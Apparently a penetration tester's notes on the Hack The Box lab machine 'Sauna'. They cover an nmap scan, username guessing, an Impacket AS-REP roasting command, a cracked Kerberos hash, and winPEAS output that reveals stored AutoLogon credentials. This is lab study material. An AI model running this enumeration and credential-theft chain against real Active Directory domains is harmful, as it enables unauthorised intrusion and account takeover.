10.10.10.175 - Sauna

Enumeration

$ nmap -sC -sV -Pn -p- -oA ./Sauna 10.10.10.175
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-31 14:01 EDT
Nmap scan report for 10.10.10.175
Host is up (0.025s latency).
Not shown: 65515 filtered ports
PORT    STATE SERVICE      VERSION
53/tcp  open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp  open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-08-01 01:06:44Z)
135/tcp open  msrpc        Microsoft Win

https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=7/31%Time=5F245D21%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h02m31s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-08-01T01:09:05
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 481.00 seconds

WebDav

Dirb\DirBuster

Nikto

Web Services

The About page gives us some employee names. Pick one and create every combination: shauncoins, shaun.coins, coinsshaun, coins.shaun, coinss, scoins, etc. See the Exploitation tab for the Impacket script used to determine that the nomenclature is firstinitiallastname = scoins.

UDP

TCP

Other

DB

SNMP

SMB

Other Services

CMS

Exploitation

Service Exploited:
Vulnerability Type:
Exploit POC:
Description:

Discovery of Vulnerability

fsmith
scoins
sdriver
btaylor
hbear
skerb

$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -format john -usersfile ./Desktop/Sauna/unames.txt EGOTISTICAL-BANK.local/ -o ./Desktop/Sauna/npu_out.txt
$ cat npu_out.txt
$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:20bd5c190cedef6b5d04fd60bae4b3ba$86a4dc0a71d48b8a4f98db4771c8d6dc71b8ad0af863acd6beeb940462dacb43246a2ca0d794485f0a82a000883c9621dddfa813c40448f20448cb3ce642613c5c01d4d68c5ab0c402c98093cc121af18377ae1

$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt ./npu_out.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     ($krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:11 DONE (2020-08-03 19:22) 0.09041g/s 952894p/s 952894c/s 952894C/s Thrall..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Exploit Code Used

Proof\Local.txt File ☐
Screenshot with ifconfig\ipconfig ☐
Submit to OSCP Exam Panel

Post Exploitation

at System.Management.ManagementScope.Initialize() at System.Management.ManagementObjectSearcher.Initialize() at System.Management.ManagementObjectSearcher.Get() at winPEAS.Program.CreateDynamicLists()
 - Creating current user groups list...
 - Creating active users list...
[X] Exception: System.NullReferenceException: Object reference not set to an instance of an object. at winPEAS.UserInfo.GetMachineUsers(Boolean onlyActive, Boolean onlyDisabled, Boolean onlyLockout, Boolean onlyAdmins, Boolean fullInfo)
 - Creating disabled users list...
[X] Exception: System.NullReferenceException: Object reference not set to an instance of an object. at winPEAS.UserInfo.GetMachineUsers(Boolean onlyActive, Boolean onlyDisabled, Boolean onlyLockout, Boolean onlyAdmins, Boolean fullInfo)
 - Admin users list...
[X] Exception: System.NullReferenceException: Object reference not set to an instance of an object. at winPEAS.UserInfo.GetMachineUsers(Boolean onlyActive, Boolean onlyDisabled, Boolean onlyLockout, Boolean onlyAdmins, Boolean fullInfo)

WinPEAS vBETA VERSION, Please if you find any issue let me know in https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues by carlospolop

[+] Leyend:
  Red          Indicates a special privilege over an object or something is misconfigured
  Green        Indicates that some protection is enabled or something is well configured
  Cyan         Indicates active users
  Blue         Indicates disabled users
  LightYellow  Indicates links

[?] You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation

==========================================(System Information)==========================================

[+] Basic System Information(T1082&T1124&T1012&T1497&T1212)
[?]
Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits
[X] Exception: Access denied
[X] Exception: Access denied
System.Collections.Generic.KeyNotFoundException: The given key was not present in the dictionary. at System.ThrowHelper.ThrowKeyNotFoundException() at System.Collections.Generic.Dictionary`2.get_Item(TKey key) at winPEAS.Program.<PrintSystemInfo>g__PrintBasicSystemInfo|40_0()

[+] PowerShell Settings()
  PowerShell v2 Version: 2.0
  PowerShell v5 Version: 5.1.17763.1
  Transcription Settings:
  Module Logging Settings:
  Scriptblock Logging Settings:
  PS history file:
  PS history size:

[+] Audit Settings(T1012)
[?] Check what is being logged
  Not Found

[+] WEF Settings(T1012)
[?] Windows Event Forwarding, is interesting to know were are sent the logs
  Not Found

[+] LAPS Settings(T1012)
[?] If installed, local administrator password is changed frequently and is restricted by ACL
  LAPS Enabled: LAPS not installed

[+] Wdigest()
[?] If enabled, plain-text crds could be stored in LSASS https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#wdigest
  Wdigest is not enabled

[+] LSA Protection()
[?] If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key) https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#lsa-protection
  LSA Protection is not enabled

[+] Credentials Guard()
[?] If enabled, a driver is needed to read LSASS memory https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#credential-guard
  CredentialGuard is not enabled

[+] Cached Creds()
[?] If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#cached-credentials
  cachedlogonscount is 10

[+] User Environment Variables()
[?] Check for some passwords or keys in the env variables
  COMPUTERNAME: SAUNA
  PUBLIC: C:\Users\Public
  LOCALAPPDATA: C:\Users\FSmith\AppData\Local
  PSModulePath: C:\Users\FSmith\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
  PROCESSOR_ARCHITECTURE: AMD64
  Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\FSmith\AppData\Local\Microsoft\WindowsApps
  CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
  ProgramFiles(x86): C:\Program Files (x86)
  PROCESSOR_LEVEL: 23
  ProgramFiles: C:\Program Files
  PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
  USERPROFILE: C:\Users\FSmith
  SystemRoot: C:\Windows
  ALLUSERSPROFILE: C:\ProgramData
  DriverData: C:\Windows\System32\Drivers\DriverData
  ProgramData: C:\ProgramData
  PROCESSOR_REVISION: 0102
  USERNAME: FSmith
  CommonProgramW6432: C:\Program Files\Common Files
  CommonProgramFiles: C:\Program Files\Common Files
  OS: Windows_NT
  PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 1 Stepping 2, AuthenticAMD
  ComSpec: C:\Windows\system32\cmd.exe
  SystemDrive: C:
  TEMP: C:\Users\FSmith\AppData\Local\Temp
  NUMBER_OF_PROCESSORS: 2
  APPDATA: C:\Users\FSmith\AppData\Roaming
  TMP: C:\Users\FSmith\AppData\Local\Temp
  ProgramW6432: C:\Program Files
  windir: C:\Windows
  USERDOMAIN: EGOTISTICALBANK
  USERDNSDOMAIN: EGOTISTICAL-BANK.LOCAL

[+] System Environment Variables()
[?] Check for some passwords or keys in the env variables
  ComSpec: C:\Windows\system32\cmd.exe
  DriverData: C:\Windows\System32\Drivers\DriverData
  OS: Windows_NT
  Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
  PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
  PROCESSOR_ARCHITECTURE: AMD64
  PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
  TEMP: C:\Windows\TEMP
  TMP: C:\Windows\TEMP
  USERNAME: SYSTEM
  windir: C:\Windows
  NUMBER_OF_PROCESSORS: 2
  PROCESSOR_LEVEL: 23
  PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 1 Stepping 2, AuthenticAMD
  PROCESSOR_REVISION: 0102

[+] HKCU Internet Settings(T1012)
  DisableCachingOfSSLPages: 0
  IE5_UA_Backup_Flag: 5.0
  PrivacyAdvanced: 1
  SecureProtocols: 2688
  User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
  CertificateRevocation: 1
  ZonesSecurityUpgrade: System.Byte[]
  EnableNegotiate: 1
  ProxyEnable: 0

[+] HKLM Internet Settings(T1012)
  ActiveXCache: C:\Windows\Downloaded Program Files
  CodeBaseSearchPath: CODEBASE
  EnablePunycode: 1
  MinorVersion: 0
  WarnOnIntranet: 1

[+] Drives Information(T1120)
[?] Remember that you should search more info inside the other drives
  C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 7 GB)(Permissions: Users [AppendData/CreateDirectories])

[+] AV Information(T1063)
[X] Exception: Invalid namespace
  No AV was detected!!
  Not Found

[+] UAC Status(T1012)
[?] If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
  ConsentPromptBehaviorAdmin: 1 - PromptOnSecureDesktop
  EnableLUA: 1
  LocalAccountTokenFilterPolicy:
  FilterAdministratorToken:
  [*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
  [-] Only the RID-500 local admin account can be used for lateral movement.
===========================================(Users Information)===========================================

[+] Users(T1087&T1069&T1033)
[?] Check if you have some admin equivalent privileges https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups
[X] Exception: System.NullReferenceException: Object reference not set to an instance of an object. at winPEAS.UserInfo.GetMachineUsers(Boolean onlyActive, Boolean onlyDisabled, Boolean onlyLockout, Boolean onlyAdmins, Boolean fullInfo)
  Current user: FSmith
  Current groups: Domain Users, Everyone, Builtin\Remote Management Users, Users, Builtin\Pre-Windows 2000 Compatible Access, Network, Authenticated Users, This Organization, NTLM Authentication
  =================================================================================================
  Not Found

[+] Current Token privileges(T1134)
[?] Check if you can escalate privilege using some enabled token https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#token-manipulation
  SeMachineAccountPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
  SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
  SeIncreaseWorkingSetPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED

[+] Clipboard text(T1134)

[+] Logged users(T1087&T1033)
[X] Exception: System.Management.ManagementException: Access denied at System.Management.ThreadDispatch.Start() at System.Management.ManagementScope.Initialize() at System.Management.ManagementObjectSearcher.Initialize() at System.Management.ManagementObjectSearcher.Get() at winPEAS.UserInfo.GetLoggedUsers()
  Not Found

[+] RDP Sessions(T1087&T1033)
  Not Found

[+] Ever logged users(T1087&T1033)
[X] Exception: System.Management.ManagementException: Access denied at System.Management.ThreadDispatch.Start() at System.Management.ManagementScope.Initialize() at System.Management.ManagementObjectSearcher.Initialize() at System.Management.ManagementObjectSearcher.Get() at winPEAS.UserInfo.GetEverLoggedUsers()
  Not Found

[+] Looking for AutoLogon credentials(T1012)
  Some AutoLogon credentials were found!!
  DefaultDomainName : EGOTISTICALBANK
  DefaultUserName : EGOTISTICALBANK\svc_loanmanager
  DefaultPassword : Moneymakestheworldgoround!

[+] Home folders found(T1087&T1083&T1033)
  C:\Users\Administrator
  C:\Users\All Users
  C:\Users\Default
  C:\Users\Default User
  C:\Users\FSmith : FSmith [AllAccess]
  C:\Users\Public
  C:\Users\svc_loanmgr

[+] Password Policies(T1201)
[?] Check for a possible brute-force
  Domain: Builtin
  SID: S-1-5-32
  MaxPasswordAge: 42.22:47:31.7437440
  MinPasswordAge: 00:00:00
  MinPasswordLength: 0
  PasswordHistoryLength: 0
  PasswordProperties: 0
  =================================================================================================
  Domain: EGOTISTICALBANK
  SID: S-1-5-21-2966785786-3096785034-1186376766
  MaxPasswordAge: 42.00:00:00
  MinPasswordAge: 1.00:00:00
  MinPasswordLength: 7
  PasswordHistoryLength: 24
  PasswordProperties: DOMAIN_PASSWORD_COMPLEX
  =================================================================================================

=======================================(Processes Information)=======================================

[+] Interesting Processes -non Microsoft-(T1010&T1057&T1007)
[?] Check if any interesting proccesses for memmory dump or if you could overwrite some binary running https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes
[X] Exception: Access denied
System.InvalidOperationException: Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
---> System.ComponentModel.Win32Exception: Access is denied
--- End of inner exception stack trace ---
at System.ServiceProcess.ServiceController.GetDataBaseHandleWithAccess(String machineName, Int32 serviceControlManagerAccess) at System.ServiceProcess.ServiceController.GetServicesOfType(String machineName, Int32 serviceType) at System.ServiceProcess.ServiceController.GetServices() at winPEAS.ServicesInfo.GetModifiableServices(Dictionary`2 SIDs) at winPEAS.Program.PrintInfoServices()

========================================(Services Information)========================================

[+] Interesting Services -non Microsoft-(T1007)
[?] Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
[X] Exception: Access denied
  @arcsas.inf,%arcsas_ServiceName%;Adaptec SAS/SATA-II RAID Storport's Miniport Driver(PMC-Sierra, Inc. - @arcsas.inf,%arcsas_ServiceName%;Adaptec SAS/SATA-II RAID Storport's Miniport Driver)[System32\drivers\arcsas.sys] - Boot
  @netbvbda.inf,%vbd_srv_desc%;QLogic Network Adapter VBD(QLogic Corporation - @netbvbda.inf,%vbd_srv_desc%;QLogic Network Adapter VBD)[System32\drivers\bxvbda.sys] - Boot
  @bcmfn2.inf,%bcmfn2.SVCDESC%;bcmfn2 Service(Windows (R) Win 7 DDK provider - @bcmfn2.inf,%bcmfn2.SVCDESC%;bcmfn2 Service)[C:\Windows\System32\drivers\bcmfn2.sys] - System
  @bxfcoe.inf,%BXFCOE.SVCDESC%;QLogic FCoE Offload driver(QLogic Corporation - @bxfcoe.inf,%BXFCOE.SVCDESC%;QLogic FCoE Offload driver)[System32\drivers\bxfcoe.sys] - Boot
  @bxois.inf,%BXOIS.SVCDESC%;QLogic Offload iSCSI Driver(QLogic Corporation - @bxois.inf,%BXOIS.SVCDESC%;QLogic Offload iSCSI Driver)[System32\drivers\bxois.sys] - Boot
  @cht4vx64.inf,%cht4vbd.generic%;Chelsio Virtual Bus Driver(Chelsio Communications - @cht4vx64.inf,%cht4vbd.generic%;Chelsio Virtual Bus Driver)[C:\Windows\System32\drivers\cht4vx64.sys] - System
  @net1ix64.inf,%e1iExpress.Service.DispName%;Intel(R) PRO/1000 PCI Express Network Connection Driver I(Intel Corporation - @net1ix64.inf,%e1iExpress.Service.DispName%;Intel(R) PRO/1000 PCI Express Network Connection Driver I)[C:\Windows\System32\drivers\e1i63x64.sys] - System
  @netevbda.inf,%vbd_srv_desc%;QLogic 10 Gigabit Ethernet Adapter VBD(QLogic Corporation - @netevbda.inf,%vbd_srv_desc%;QLogic 10 Gigabit Ethernet Adapter VBD)[System32\drivers\evbda.sys] - Boot
  @ialpssi_gpio.inf,%iaLPSSi_GPIO.SVCDESC%;Intel(R) Serial IO GPIO Controller Driver(Intel Corporation - @ialpssi_gpio.inf,%iaLPSSi_GPIO.SVCDESC%;Intel(R) Serial IO GPIO Controller Driver)[C:\Windows\System32\drivers\iaLPSSi_GPIO.sys] - System
  @ialpssi_i2c.inf,%iaLPSSi_I2C.SVCDESC%;Intel(R) Serial IO I2C Controller Driver(Intel Corporation - @ialpssi_i2c.inf,%iaLPSSi_I2C.SVCDESC%;Intel(R) Serial IO I2C Controller Driver)[C:\Windows\System32\drivers\iaLPSSi_I2C.sys] - System
  @iastorav.inf,%iaStorAVC.DeviceDesc%;Intel Chipset SATA RAID Controller(Intel Corporation - @iastorav.inf,%iaStorAVC.DeviceDesc%;Intel Chipset SATA RAID Controller)[System32\drivers\iaStorAVC.sys] - Boot
  @iastorv.inf,%*PNP0600.DeviceDesc%;Intel RAID Controller Windows 7(Intel Corporation - @iastorv.inf,%*PNP0600.DeviceDesc%;Intel RAID Controller Windows 7)[System32\drivers\iaStorV.sys] - Boot
  @mlx4_bus.inf,%Ibbus.ServiceDesc%;Mellanox InfiniBand Bus/AL (Filter Driver)(Mellanox - @mlx4_bus.inf,%Ibbus.ServiceDesc%;Mellanox InfiniBand Bus/AL (Filter Driver))[C:\Windows\System32\drivers\ibbus.sys] - System
  kKzf(kKzf)[C:\Windows\lsiUs-MaR.exe] - System
  @mlx4_bus.inf,%MLX4BUS.ServiceDesc%;Mellanox ConnectX Bus Enumerator(Mellanox - @mlx4_bus.inf,%MLX4BUS.ServiceDesc%;Mellanox ConnectX Bus Enumerator)[C:\Windows\System32\drivers\mlx4_bus.sys] - System
  @mlx4_bus.inf,%ndfltr.ServiceDesc%;NetworkDirect Service(Mellanox - @mlx4_bus.inf,%ndfltr.ServiceDesc%;NetworkDirect Service)[C:\Windows\System32\drivers\ndfltr.sys] - System
  OmQX(OmQX)[C:\Windows\gsefpsnT.exe] - System
  @netqevbda.inf,%vbd_srv_desc%;QLogic FastLinQ Ethernet VBD(Cavium, Inc. - @netqevbda.inf,%vbd_srv_desc%;QLogic FastLinQ Ethernet VBD)[System32\drivers\qevbda.sys] - Boot
  @qefcoe.inf,%QEFCOE.SVCDESC%;QLogic FCoE driver(Cavium, Inc. - @qefcoe.inf,%QEFCOE.SVCDESC%;QLogic FCoE driver)[System32\drivers\qefcoe.sys] - Boot
  @qeois.inf,%QEOIS.SVCDESC%;QLogic 40G iSCSI Driver(QLogic Corporation - @qeois.inf,%QEOIS.SVCDESC%;QLogic 40G iSCSI Driver)[System32\drivers\qeois.sys] - Boot
  @ql2300.inf,%ql2300i.DriverDesc%;QLogic Fibre Channel STOR Miniport Inbox Driver (wx64)(QLogic Corporation - @ql2300.inf,%ql2300i.DriverDesc%;QLogic Fibre Channel STOR Miniport Inbox Driver (wx64))[System32\drivers\ql2300i.sys] - Boot
  @ql40xx2i.inf,%ql40xx2i.DriverDesc%;QLogic iSCSI Miniport Inbox Driver(QLogic Corporation - @ql40xx2i.inf,%ql40xx2i.DriverDesc%;QLogic iSCSI Miniport Inbox Driver)[System32\drivers\ql40xx2i.sys] - Boot
  @qlfcoei.inf,%qlfcoei.DriverDesc%;QLogic [FCoE] STOR Miniport Inbox Driver (wx64)(QLogic Corporation - @qlfcoei.inf,%qlfcoei.DriverDesc%;QLogic [FCoE] STOR Miniport Inbox Driver (wx64))[System32\drivers\qlfcoei.sys] - Boot
  OpenSSH Authentication Agent(OpenSSH Authentication Agent)[C:\Windows\System32\OpenSSH\ssh-agent.exe] - Manual
    Agent to hold private keys used for public key authentication.
  @usbstor.inf,%USBSTOR.SvcDesc%;USB Mass Storage Driver(@usbstor.inf,%USBSTOR.SvcDesc%;USB Mass Storage Driver)[C:\Windows\System32\drivers\USBSTOR.SYS] - System
  @usbxhci.inf,%PCI\CC_0C0330.DeviceDesc%;USB xHCI Compliant Host Controller(@usbxhci.inf,%PCI\CC_0C0330.DeviceDesc%;USB xHCI Compliant Host Controller)[C:\Windows\System32\drivers\USBXHCI.SYS] - System
  VMware Alias Manager and Ticket Service(VMware, Inc. - VMware Alias Manager and Ticket Service)["C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"] - Autoload
    Alias Manager and Ticket Service
  @oem9.inf,%loc.vmciServiceDisplayName%;VMware VMCI Bus Driver(VMware, Inc. - @oem9.inf,%loc.vmciServiceDisplayName%;VMware VMCI Bus Driver)[System32\drivers\vmci.sys] - Boot
  Memory Control Driver(VMware, Inc. - Memory Control Driver)[C:\Windows\system32\DRIVERS\vmmemctl.sys] - Autoload
    Driver to provide enhanced memory management of this virtual machine.
  @oem7.inf,%VMMouse.SvcDesc%;VMware Pointing Device(VMware, Inc. - @oem7.inf,%VMMouse.SvcDesc%;VMware Pointing Device)[C:\Windows\System32\drivers\vmmouse.sys] - System
  VMware Tools(VMware, Inc. - VMware Tools)["C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"] - Autoload
    Provides support for synchronizing objects between the host and guest operating systems.
  @oem6.inf,%VMUsbMouse.SvcDesc%;VMware USB Pointing Device(VMware, Inc. - @oem6.inf,%VMUsbMouse.SvcDesc%;VMware USB Pointing Device)[C:\Windows\System32\drivers\vmusbmouse.sys] - System
  VMware CAF AMQP Communication Service(VMware CAF AMQP Communication Service)["C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\CommAmqpListener.exe"] - System
    VMware Common Agent AMQP Communication Service
  VMware CAF Management Agent Service(VMware CAF Management Agent Service)["C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\ManagementAgentHost.exe"] - Autoload
    VMware Common Agent Management Agent Service
  vSockets Virtual Machine Communication Interface Sockets driver(VMware, Inc. - vSockets Virtual Machine Communication Interface Sockets driver)[C:\Windows\system32\DRIVERS\vsock.sys] - Boot
    vSockets Driver
  @vstxraid.inf,%Driver.DeviceDesc%;VIA StorX Storage RAID Controller Windows Driver(VIA Corporation - @vstxraid.inf,%Driver.DeviceDesc%;VIA StorX Storage RAID Controller Windows Driver)[System32\drivers\vstxraid.sys] - Boot
  @%SystemRoot%\System32\drivers\vwifibus.sys,-257(@%SystemRoot%\System32\drivers\vwifibus.sys,-257)[C:\Windows\System32\drivers\vwifibus.sys] - System
    @%SystemRoot%\System32\drivers\vwifibus.sys,-258
  @mlx4_bus.inf,%WinMad.ServiceDesc%;WinMad Service(Mellanox - @mlx4_bus.inf,%WinMad.ServiceDesc%;WinMad Service)[C:\Windows\System32\drivers\winmad.sys] - System
  @winusb.inf,%WINUSB_SvcName%;WinUsb Driver(@winusb.inf,%WINUSB_SvcName%;WinUsb Driver)[C:\Windows\System32\drivers\WinUSB.SYS] - System
    @winusb.inf,%WINUSB_SvcDesc%;Generic driver for USB devices
  @mlx4_bus.inf,%WinVerbs.ServiceDesc%;WinVerbs Service(Mellanox - @mlx4_bus.inf,%WinVerbs.ServiceDesc%;WinVerbs Service)[C:\Windows\System32\drivers\winverbs.sys] - System
  Yars(Yars)[C:\Windows\IVLRnUHL.exe] - System

[+] Modifiable Services(T1007)
[?]
Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
You cannot modify any service

[+] Looking if you can modify any service registry()
[?] Check if you can modify the registry of a service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services-registry-permissions
[-] Looks like you cannot change the registry of any service...

[+] Checking write permissions in PATH folders (DLL Hijacking)()
[?] Check for DLL Hijacking in PATH folders https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking
C:\Windows\system32
C:\Windows
C:\Windows\System32\Wbem
C:\Windows\System32\WindowsPowerShell\v1.0\
C:\Windows\System32\OpenSSH\

====================================(Applications Information)====================================

[+] Current Active Window Application(T1010&T1518)
System.NullReferenceException: Object reference not set to an instance of an object.
   at winPEAS.MyUtils.GetPermissionsFile(String path, Dictionary`2 SIDs)
   at winPEAS.Program.<PrintInfoApplications>g__PrintActiveWindow|44_0()

[+] Installed Applications --Via Program Files/Uninstall registry--(T1083&T1012&T1010&T1518)
[?] Check if you can modify installed software https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software
C:\Program Files\Common Files
C:\Program Files\desktop.ini
C:\Program Files\internet explorer
C:\Program Files\Uninstall Information
C:\Program Files\VMware
C:\Program Files\Windows Defender
C:\Program Files\Windows Defender Advanced Threat Protection
C:\Program Files\Windows Mail
C:\Program Files\Windows Media Player
C:\Program Files\Windows Multimedia Platform
C:\Program Files\windows nt
C:\Program Files\Windows Photo Viewer
C:\Program Files\Windows Portable Devices
C:\Program Files\Windows Security
C:\Program Files\Windows Sidebar
C:\Program Files\WindowsApps
C:\Program Files\WindowsPowerShell

[+] Autorun Applications(T1010)
[?] Check if you can modify other users AutoRuns binaries https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup
System.IO.DirectoryNotFoundException: Could not find a part of the path 'C:\Users\FSmith\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'.
   at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
   at System.IO.FileSystemEnumerableIterator`1.CommonInit()
   at System.IO.FileSystemEnumerableIterator`1..ctor(String path, String originalUserPath, String searchPattern, SearchOption searchOption, SearchResultHandler`1 resultHandler, Boolean checkHost)
   at System.IO.Directory.GetFiles(String path, String searchPattern, SearchOption searchOption)
   at winPEAS.ApplicationInfo.GetAutoRunsFolder()
   at winPEAS.ApplicationInfo.GetAutoRuns(Dictionary`2 NtAccountNames)
   at winPEAS.Program.<PrintInfoApplications>g__PrintAutoRuns|44_2()

[+] Scheduled Applications --Non Microsoft--(T1010)
[?] Check if you can modify other users scheduled binaries https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup
System.IO.FileNotFoundException: Could not load file or assembly 'Microsoft.Win32.TaskScheduler, Version=2.8.16.0, Culture=neutral, PublicKeyToken=c416bc1b32d97233' or one of its dependencies. The system cannot find the file specified.
File name: 'Microsoft.Win32.TaskScheduler, Version=2.8.16.0, Culture=neutral, PublicKeyToken=c416bc1b32d97233'
   at winPEAS.ApplicationInfo.GetScheduledAppsNoMicrosoft()
   at winPEAS.Program.<PrintInfoApplications>g__PrintScheduled|44_3()

WRN: Assembly binding logging is turned OFF.
To enable assembly bind failure logging, set the registry value [HKLM\Software\Microsoft\Fusion!EnableLog] (DWORD) to 1.
Note: There is some performance penalty associated with assembly bind failure logging.
To turn this feature off, remove the registry value [HKLM\Software\Microsoft\Fusion!EnableLog].

=========================================(Network Information)=========================================

[+] Network Shares(T1135)
[X] Exception: Access denied

[+] Host File(T1016)

[+] Network Ifaces and known hosts(T1016)
[?] The masks are only for the IPv4 addresses
Ethernet0[00:50:56:B9:0E:F9]: 10.10.10.175, fe80::89a7:e1b:148f:2260%8, dead:beef::89a7:e1b:148f:2260 / 255.255.255.0
    Gateways: 10.10.10.2, fe80::250:56ff:feb9:f9ab%8
    DNSs: ::1, 127.0.0.1
    Known hosts:
        10.10.10.2        00-50-56-B9-F9-AB    Dynamic
        10.10.10.255      FF-FF-FF-FF-FF-FF    Static
        224.0.0.22        01-00-5E-00-00-16    Static
        224.0.0.251       01-00-5E-00-00-FB    Static
        224.0.0.252       01-00-5E-00-00-FC    Static

Loopback Pseudo-Interface 1[]: 127.0.0.1, ::1 / 255.0.0.0
    DNSs: fec0:0:0:ffff::1%1, fec0:0:0:ffff::2%1, fec0:0:0:ffff::3%1
    Known hosts:
        224.0.0.22        00-00-00-00-00-00    Static

[+] Current Listening Ports(T1049&T1049)
[?] 
Check for services restricted from the outside
[+] Firewall Rules(T1016)
[?] Showing only DENY rules (too many ALLOW rules always)
Current Profiles: PUBLIC
FirewallEnabled (Domain): True
FirewallEnabled (Private): True
FirewallEnabled (Public): True
DENY rules:

[+] DNS cached --limit 70--(T1016)
Entry    Name    Data
[X] Exception: Access denied

=========================================(Windows Credentials)=========================================

[+] Checking Windows Vault()
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-manager-windows-vault
[ERROR] Unable to enumerate vaults.
Error (0x1061)
Not Found

[+] Checking Credential manager()
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-manager-windows-vault
This function is not yet implemented.
[i] If you want to list credentials inside Credential Manager use 'cmdkey /list'

[+] Saved RDP connections()
Not Found

[+] Recently run commands()
Not Found

[+] PS default transcripts history()
[i] Read the PS history inside these files (if any)

[+] Checking for DPAPI Master Keys()
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
MasterKey: C:\Users\FSmith\AppData\Roaming\Microsoft\Protect\S-1-5-21-2966785786-3096785034-1186376766-1105\ca6bc5b5-57d3-4f19-9f5a-3016d1e57c8f
Accessed: 1/24/2020 6:30:19 AM
Modified: 1/24/2020 6:30:19 AM
=================================================================================================

[+] Checking for Credential Files()
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi
Not Found

[+] Checking for RDCMan Settings Files()
[?] Dump credentials from Remote Desktop Connection Manager https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager
Not Found

[+] Looking for kerberos tickets()
[?] https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88
[X] Exception: Object reference not set to an instance of an object.
Not Found

[+] Looking saved Wifis()
This function is not yet implemented.
[i] If you want to list saved Wifis connections you can list the using 'netsh wlan show profile'
[i] If you want to get the clear-text password use 'netsh wlan show profile <SSID> key=clear'

[+] Looking AppCmd.exe()
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe
